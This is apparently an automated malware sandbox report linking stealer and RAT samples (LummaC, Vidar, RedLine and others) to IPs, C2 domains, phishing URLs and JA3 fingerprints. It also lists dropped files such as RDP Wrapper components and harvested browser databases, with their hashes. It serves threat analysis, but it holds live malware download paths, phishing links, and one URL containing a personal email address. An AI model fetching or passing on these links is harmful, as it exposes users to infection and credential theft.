8.46.123.33	GvQcD0PvEH.exe	Get hash	malicious	Unknown	Browse
8.46.123.33	exe4.bin.bak.exe	Get hash	malicious	BlackMoon, GhostRat	Browse
147.45.44.104	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	147.45.44.104/malesa/66ed86be077bb_12.exe
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	147.45.44.104/malesa/66ed86be077bb_12.exe
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	147.45.44.104/malesa/66ed86be077bb_12.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
cowod.hopto.org	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
fragnantbui.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
offensivedzvju.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FREE-NET-ASFREEnetEU	file.exe	Get hash	malicious	LummaC	Browse	147.45.44.131
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	147.45.44.104
	https://bnbvfd.crabdance.com/clients/login.php	Get hash	malicious	Unknown	Browse	147.45.45.70
	https://tmsm.krtra.com/c/R2QnECLcaUYf/mYo0	Get hash	malicious	Unknown	Browse	147.45.47.98
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	147.45.44.131
LIFELINK-ASRU	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
AS-PUBMATICUS	http://bt-105687.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	https://docs.zoom.us/doc/c63Sae4RQ6OyTcxmh_zLzw?from=email&data=05%7C02%7CRyan.Deiter@americansignature.com%7Ce3b8b957491b4e36dfd108dcde65b619%7C5c02e89ab9684d4e960de62c7cd02766%7C0%7C0%7C638629775655136517%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=RMvLQDF1y92hR5HKChbiO0e0aKONAOKzPjDkQ4i5MTY=&reserved=0	Get hash	malicious	Unknown	Browse	185.64.191.210
	https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdf	Get hash	malicious	HTMLPhisher	Browse	198.47.127.20
	https://is.gd/fxcRir	Get hash	malicious	Unknown	Browse	198.47.127.18
	https://cancelar-plan-pr0teccion1.w3spaces.com/	Get hash	malicious	Unknown	Browse	198.47.127.19
	https://mail-105280.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	https://telstra-102246.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	https://mitammakslogona.gitbook.io/	Get hash	malicious	Unknown	Browse	185.64.191.210
	https://telstra-104752.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	https://gumenilogiz.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	185.64.191.210

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://upholdxyi_login.godaddysites.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://eastlink-100612.weeblysite.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	VL1xZpPp1I.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.filemail.com/d/qyopmnowcnooqdd	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://url.us.m.mimecastprotect.com/s/NhduCzpA73FDm0Yhgi0C9-qzu?domain=filemail.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	175e4400e2e99b0d0ac35bd3fe68519fa91f9ae5cc7a7.exe	Get hash	malicious	Quasar	Browse	188.114.96.3
	Daniel Leblanc shared _Incendie Hudson._ with you. #12.eml	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Quasar, WhiteSnake Stealer	Browse	188.114.96.3
	https://empshentel.com/share/sharefile/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 104.21.36.139 188.114.96.3 104.102.49.254 172.67.208.139
	Baylor financial-RemittanceSeptember 26, 2024_-YTRKOKQTQALJDQKMPCNJ.xlsx	Get hash	malicious	Unknown	Browse	104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 104.21.36.139 188.114.96.3 104.102.49.254 172.67.208.139
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 104.21.36.139 188.114.96.3 104.102.49.254 172.67.208.139
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 104.21.36.139 188.114.96.3 104.102.49.254 172.67.208.139
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 104.21.36.139 188.114.96.3 104.102.49.254 172.67.208.139
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 104.21.36.139 188.114.96.3 104.102.49.254 172.67.208.139
	http://google.com	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 104.21.36.139 188.114.96.3 104.102.49.254 172.67.208.139
	https://finalstepgo.com/uploads/il2.txt	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 104.21.36.139 188.114.96.3 104.102.49.254 172.67.208.139
	https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH	Get hash	malicious	Unknown	Browse	104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 104.21.36.139 188.114.96.3 104.102.49.254 172.67.208.139
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.102.49.254
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.102.49.254
	Payment copy.vbs	Get hash	malicious	FormBook, GuLoader	Browse	104.102.49.254
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	104.102.49.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\RDP Wrapper\rdpwrap.dll	smss.exe	Get hash	malicious	RMSRemoteAdmin, RDPWrap Tool, xRAT	Browse
	CVE-2024-38143 poc.exe	Get hash	malicious	Codoso Ghost, UACMe	Browse
	LisectAVT_2403002A_44.exe	Get hash	malicious	AveMaria, UACMe	Browse
	6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe	Get hash	malicious	AveMaria, UACMe	Browse
	234880953-042446-sanlccjavap0003-3849.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse
	YQR4CA11sP.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse
	jYHfnNP0MN.exe	Get hash	malicious	AveMaria, Blank Grabber, PrivateLoader, UACMe	Browse
	Filezillawin_94199_patched.exe	Get hash	malicious	Unknown	Browse
	PO7431.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse
	RDPWInst-v1.6.2.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files\RDP Wrapper\rdpwrap.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	116736
Entropy (8bit):	5.884975745255681
Encrypted:	false
SSDEEP:	3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
MD5:	461ADE40B800AE80A40985594E1AC236
SHA1:	B3892EEF846C044A2B0785D54A432B3E93A968C8
SHA-256:	798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
SHA-512:	421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54%
Joe Sandbox View:	Filename: smss.exe, Detection: malicious, Browse Filename: CVE-2024-38143 poc.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_44.exe, Detection: malicious, Browse Filename: 6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe, Detection: malicious, Browse Filename: 234880953-042446-sanlccjavap0003-3849.exe, Detection: malicious, Browse Filename: YQR4CA11sP.exe, Detection: malicious, Browse Filename: jYHfnNP0MN.exe, Detection: malicious, Browse Filename: Filezillawin_94199_patched.exe, Detection: malicious, Browse Filename: PO7431.exe, Detection: malicious, Browse Filename: RDPWInst-v1.6.2.msi, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Program Files\RDP Wrapper\rdpwrap.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	443552
Entropy (8bit):	5.4496544667416975
Encrypted:	false
SSDEEP:	768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
MD5:	92BC5FEDB559357AA69D516A628F45DC
SHA1:	6468A9FA0271724E70243EAB49D200F457D3D554
SHA-256:	85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
SHA-512:	87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-09-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\ProgramData\AFHDGDGIID.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73216
Entropy (8bit):	7.6619916056452
Encrypted:	false
SSDEEP:	1536:Cnxe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/TktxF3s2O6kiz:Cnx0I26z/8uz22gaxH2zT6xFnO6Jz
MD5:	8C46913FBA5CA6A0CB8C4E839EF3A3AE
SHA1:	95EFA5E6909359A0D30E95B8EEAD7D0116F8B693
SHA-256:	1268E903700241813C51A97AF8513C97306FCDC6987F4C7E2E0EC02EB71BD6CB
SHA-512:	B011191A827D75C9018D50BA3DF0BA045BB4EF8000711DCDD1B117F9D257B2FE1F9722C38FE61BCABCCA58DBE281FD7605F43CA3B339B428BCC6F5C3A5B8EC6E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\AFHDGDGIID.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............."... ...@....@.. ....................................`..................................!..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......t...D%...........,...............................................(".....(....6.\|.....(0...Vs1...r...p(....(2...Js1....s3....(4...Zr...p(....(.....oE.....(N...:....r...p(.....r&..p(....(O...(.....r...p(....(....r...p(....oE...:....r...p(....r...p(.....rM..p(.....{....rM..p(....(R...oS...(T...b.:....r...p(.....oU....0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+......0../.........(....}

C:\ProgramData\BFBKFHIDHIIJ\CBAKJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\BFBKFHIDHIIJ\EBFHJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFBKFHIDHIIJ\EBFHJE-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFBKFHIDHIIJ\EHDHID

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFBKFHIDHIIJ\GDAAKK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFBKFHIDHIIJ\GIEHJK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFBKFHIDHIIJ\IDHIEB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFBKFHIDHIIJ\IJECAE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

